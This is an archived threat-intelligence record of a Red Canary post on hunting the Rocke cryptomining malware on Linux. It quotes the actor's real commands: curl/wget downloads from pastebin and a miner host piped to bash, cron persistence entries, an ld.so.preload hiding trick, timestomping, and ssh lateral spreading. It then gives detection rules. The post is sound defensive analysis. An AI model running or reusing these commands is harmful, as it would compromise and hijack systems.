{
	"id": "5f8fbd96-bd47-42bc-8e1c-3734c007e0bc",
	"created_at": "2026-04-06T00:17:32.690025Z",
	"updated_at": "2026-04-10T13:11:55.483118Z",
	"deleted_at": null,
	"sha1_hash": "238a0dc2d7c417664d146b73a4ade9718a20edbe",
	"title": "Threat Hunting in Linux For Rocke Cryptocurrency Mining Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 91603,
	"plain_text": "Threat Hunting in Linux For Rocke Cryptocurrency Mining\r\nMalware\r\nBy Brian Donohue\r\nArchived: 2026-04-05 19:13:33 UTC\r\nIn this post, we’ll cover a threat actor named Rocke (also known as Iron) and some of the techniques the actor\r\nuses to compromise Linux systems. Palo Alto Networks’ Unit 42 and Cisco Talos Group have each published\r\nresearch examining Rocke campaigns, noting that the adversary’s activity dates back at least as far as April 2018.\r\nRocke has primarily been associated with cryptocurrency mining payloads and the Xbash malware family.\r\nHowever, in recent campaigns, notably those examined by Talos Group and Unit 42 in August 2018 and January\r\n2019 respectively, the adversary has combined its cryptocurrency mining payloads with a script to establish\r\npersistence and uninstall security software that may prevent it from executing.\r\nWe’re going to focus on tactics, techniques, and procedures (TTPs) from this recent campaign and recommend\r\nsome hunts that will help you uncover Rocke-related activity in your environment using endpoint data.\r\nRemote Code Execution in Public-Facing Apps (T1190)\r\nPublished research by Unit 42 and Talos Group indicates that Rocke has exploited remote code execution (RCE)\r\nvulnerabilities in Oracle Weblogic, Apache Struts, Adobe ColdFusion, phpMyAdmin, Redis, and other public-facing services. It’s ideal but difficult to detect Rocke in near-real-time as the adversary attempts to execute code.\r\nDepending on the configuration of web applications in your organization, legitimate command shells may appear\r\nvery similar to web shells and RCE vulnerabilities when examined via endpoint detection and response (EDR)\r\ntelemetry. Since Rocke exploits a diverse array of services, it may be more effective to approach detection from a\r\nreporting perspective rather than an alerting perspective. 
By leveraging this method, you can review endpoint data\r\nperiodically to see which processes have spawned from PHP, Java, or other processes associated with the services\r\nthat Rocke is thought to exploit.\r\nExecution \u0026 Discovery\r\nDownloading and Deobfuscating Code (T1140)\r\nWhen Rocke achieves code execution on an endpoint, the actor proceeds to use the curl or wget utilities to\r\ndownload payloads to execute with a bash shell. The downloaded payloads are hosted using Pastebin, a popular\r\nonline code repository.\r\n(curl -fsSL hxxps://pastebin[.]com/raw/sF3gViaw || wget -q -O- hxxps://pastebin[.]com/raw/sF3gViaw)|base64 -d |/bin/bash\r\nhttps://redcanary.com/blog/rocke-cryptominer/\r\nPage 1 of 6\n\nThe above command is a first stage script that delivers further payloads to a host. It uses the curl or wget\r\ncommand—depending on which is present on the host—then uses the base64 utility to deobfuscate the\r\ndownloaded code and execute that result using the bash command shell. The second stage delivered is quite\r\nlengthy, and we’ll collapse it to only the relevant portions for detection here.\r\nStopping Competing Miners\r\nThe first part of the second stage script delivered by Rocke attempts to stop other cryptocurrency miner processes\r\nwith commands such as:\r\npkill -f xmrig\r\npkill -f Loopback\r\npkill -f apaceha\r\npkill -f cryptonight\r\npkill -f stratum\r\npkill -f minerd\r\nThese commands eliminate potential competition for resources on an infected system, but they also present a\r\npotentially high-fidelity alert for defenders. Most environments do not commonly execute these pkill\r\ncommands with command line options including miner names.\r\nDiscovering Competing Miners Using Network Connections (T1049)\r\nAfter these process-stopping commands, Rocke conducts additional reconnaissance to determine if unknown\r\nminers are executing on the system using the netstat command. 
By stringing the output of netstat together\r\nwith text searches, the actor searches for additional processes to stop:\r\nnetstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9\r\nnetstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9\r\nnetstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9\r\nSystem administrators may commonly use the netstat command, but most operational environments probably\r\ndon’t often use grep commands to search for the strings :3333, :4444, or :5555. These grep commands\r\n—along with the pkill commands above—present an interesting phenomenon: they are common fixtures\r\namong cryptocurrency miner script payloads for Linux in general that are not exclusive to Rocke. For research on\r\nyour own, you can perform a quick Google search to verify this using the following terms:\r\n\"pkill\" \"xmrig\" site:pastebin.com\r\nWhile traditional command line logging is rarely implemented on most Linux systems, EDR solutions or other\r\naudit technologies that keep this information allow a focused detection approach, even into historical records.\r\nMiner Payload Execution and Masquerading (T1036)\r\nOnce the path has been cleared of other miners, Rocke then deploys its mining payload.\r\n(curl -fsSL --connect-timeout 120 hxxps://master[.]minerxmr[.]ru/One/c -o /var/tmp/config.json||wget\r\nhxxps://master[.]minerxmr[.]ru/One/c -O /var/tmp/config.json) \u0026\u0026 chmod +x /var/tmp/config.json\r\n(curl -fsSL --connect-timeout 120 hxxps://master[.]minerxmr[.]ru/One/x1 -o /var/tmp/kworkerds||wget\r\nhxxps://master[.]minerxmr[.]ru/One/x1 -O /var/tmp/kworkerds) \u0026\u0026 chmod +x /var/tmp/kworkerds\r\nnohup /var/tmp/kworkerds \u003e/dev/null 2\u003e\u00261 \u0026\r\nAs with previous payload deliveries, the miner itself is downloaded using curl or wget. 
First, a config.json\r\nfile containing miner configuration data is written to the /tmp folder followed shortly after by a miner binary\r\nitself named kworkerds. The miner is executed using the nohup command, discarding the output and allowing\r\nthe binary to execute in the background with a trailing ampersand ( \u0026 ) in the command line.\r\nExecution in this manner is a form of masquerading, as the binary is named partially after a Linux kernel worker\r\nthread. Linux systems will execute processes named kworker all the time, but the processes will not use a binary\r\nin a /tmp folder. This becomes a high-fidelity behavior to use for alerts.\r\nPersisting with Cron Jobs (T1168)\r\nRocke uses cron jobs to persist on victim systems. Cron is a *NIX technology analogous to (and long predating)\r\nScheduled Tasks in Windows. It gives system administrators the ability to execute commands on a schedule\r\nwithout the need to be logged in to a system. It also allows them the ability to schedule commands to execute as\r\nnon-administrator users on a system. When adversaries manipulate cron jobs, they usually do so in one of two\r\nways:\r\n1. Replacing the cron schedule, known as a crontab, with their own\r\n2. Placing a malicious script in a folder known to contain scripts that will execute hourly, daily, or weekly as\r\npart of existing cron jobs\r\nIn this case, Rocke uses both options. They placed malicious scripts into folders known to execute during cron\r\njobs. 
This is achieved by using curl or wget, depending on system support, to download a bash shell script\r\nand write it into numerous folders:\r\n/etc/cron.hourly/oanacroner\r\n/etc/cron.daily/oanacroner\r\n/etc/cron.monthly/oanacroner\r\n(curl -fsSL --connect-timeout 120 hxxps://pastebin[.]com/raw/1NtRkBc3 -o\r\n/etc/cron.hourly/oanacroner||wget hxxps://pastebin[.]com/raw/1NtRkBc3 -O /etc/cron.hourly/oanacroner)\r\nDepending on the configuration of a Linux system, crontab schedules may exist in numerous locations for\r\nmultiple users. Rocke takes advantage of this to modify crontabs in these locations:\r\n/etc/cron.d/root\r\n/etc/cron.d/apache\r\n/var/spool/cron/root\r\n/var/spool/cron/crontabs/root\r\necho -e \"*/10 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh\\n##\" \u003e /etc/cron.d/root\r\nTo modify these schedules, Rocke directly modifies the files by echoing content into them as shown above. This\r\nmethod of editing crontab schedules is used by other adversaries, and we’ve also found other adversaries use the\r\ncrontab system utility to replace schedules in a different fashion. The echo method is harder to observe using\r\nEDR data as echo is an internal shell command rather than a utility.\r\nDefense Evasion\r\nHiding Processes with Process Injection (T1055)\r\nRocke uses a novel method to hide the execution of kworkerds from casual observation. The adversary uses a\r\nmodified version of the libprocesshider project compiled as a shared object, the Linux equivalent of a Windows\r\nDynamic-Link Library (DLL). 
To execute the code, Rocke modifies /etc/ld.so.preload, a configuration file\r\nthat will inject listed shared objects into executing processes on a Linux system.\r\necho /usr/local/lib/libntpd.so \u003e /etc/ld.so.preload\r\nThis will prevent processes such as the ps utility from observing kworkerds, but it will not prevent security\r\nsoftware that monitors syscalls from observing the malicious process. Trend Micro showed the effects of this\r\ntechnique in a blog post.\r\nThe ld.so.preload configuration file isn’t modified very often outside certain software packages. This can be a\r\nmedium confidence alert once it’s been tuned for a given environment, with much higher confidence when\r\ncombined with other means of detection previously addressed.\r\nChanging Timestamps (T1099)\r\nThis adversary uses the touch command to manipulate timestamps on victim systems in a process known as\r\n“timestomping.” This technique hinders filesystem forensic analysis to determine what files were modified around\r\nthe time of illicit activity. To modify timestamps, numerous commands similar to this are issued:\r\ntouch -acmr /bin/sh /etc/cron.hourly/oanacroner\r\nThis command allows Rocke to change the access and modification timestamps (as indicated by the a and m\r\nflags) of /etc/cron.hourly/oanacroner without creating the file if it doesn’t already exist (via the c flag). The\r\nmodification of timestamps with touch usually uses the current system time unless told otherwise. In this case,\r\nRocke uses touch with the r command flag to specify a reference file of /bin/sh. This allows touch to copy\r\ntimestamps from /bin/sh and apply them to the specified script file left by the adversary. 
This action blends the\r\ntimestamps of numerous malicious files in with the timestamps of files changed during updates and installations.\r\nLateral Movement with SSH (T1021)\r\nAdversaries deploying cryptocurrency miners on Windows commonly use built-in services to move laterally, and\r\nthe same is true of Linux systems in this case. Rocke looks for the presence of SSH public key configuration and a\r\nlist of known local hosts on a Linux server to move laterally. If these materials are present, the adversary issues\r\ncommands using the ssh utility such as these, where $h is a variable in the script for discovered hosts:\r\nssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL\r\nhxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh'\r\nIf it successfully connects to any other system, the same sequence of events described in the rest of the article\r\nhappens on connected systems. 
This behavior can lead to a medium confidence alert once some tuning brings\r\nsystem administration and software deployment noise down.\r\nBehavioral Indicators of Compromise\r\nDetecting Stops of Miner Processes\r\nHigh Confidence\r\nProcess is pkill AND\r\nCommand line contains stratum, minerd, xmr, OR cryptonight\r\nRecon of Miner Network Connections\r\nMedium Confidence, tune out JAMF configuration management if needed\r\nProcess is grep AND\r\nCommand line contains :3333, :4444, OR :5555\r\nDownloading from Pastebin\r\nHigh Confidence\r\nProcess is curl OR wget AND\r\nCommand line contains pastebin.com\r\nDownloading Binary to Temporary Folders\r\nMedium Confidence, tune out configuration management systems\r\nProcess is curl OR wget AND\r\nWrites ELF binary to /tmp/, /var/tmp, OR /dev/shm\r\nTimestamp Manipulation\r\nHigh Confidence, fragile due to ability to change command line flags\r\nProcess is touch AND\r\nCommand line contains -acmr\r\nCode Injection Using Preload\r\nMedium confidence, tune out system monitoring and backup systems\r\nFile modified is /etc/ld.so.preload\r\nLateral Movement Using SSH\r\nMedium confidence, tune out software deployment\r\nProcess is ssh AND\r\nCommand line contains curl, wget, AND |sh\r\nConclusion\r\nThe tools and techniques used by Rocke to compromise Linux systems exhibit clear-cut, malicious behavior, and\r\nyou can definitely use the behaviors to detect this actor in your environment. Approaching with the recommended\r\nsteps will help you build detection capabilities for your Linux endpoints that will mirror coverage you have for the\r\nWindows portion of your network.\r\nSource: https://redcanary.com/blog/rocke-cryptominer/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://redcanary.com/blog/rocke-cryptominer/"
	],
	"report_names": [
		"rocke-cryptominer"
	],
	"threat_actors": [
		{
			"id": "7c053836-8f50-4d40-bc5c-7088967e1b57",
			"created_at": "2022-10-25T16:07:24.549525Z",
			"updated_at": "2026-04-10T02:00:05.03048Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra",
				"G0106",
				"Iron Group",
				"Rocke"
			],
			"source_name": "ETDA:Rocke",
			"tools": [
				"Godlua",
				"Kerberods",
				"LSD",
				"Pro-Ocean",
				"Xbash"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "905eabd9-2b7f-483d-86bd-0c72f96b4162",
			"created_at": "2023-01-06T13:46:39.02749Z",
			"updated_at": "2026-04-10T02:00:03.185957Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra"
			],
			"source_name": "MISPGALAXY:Rocke",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0b02af5f-2027-42b7-a6f2-51e2fd49ba7f",
			"created_at": "2022-10-25T15:50:23.360509Z",
			"updated_at": "2026-04-10T02:00:05.337702Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Rocke"
			],
			"source_name": "MITRE:Rocke",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434652,
	"ts_updated_at": 1775826715,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/238a0dc2d7c417664d146b73a4ade9718a20edbe.pdf",
		"text": "https://archive.orkl.eu/238a0dc2d7c417664d146b73a4ade9718a20edbe.txt",
		"img": "https://archive.orkl.eu/238a0dc2d7c417664d146b73a4ade9718a20edbe.jpg"
	}
}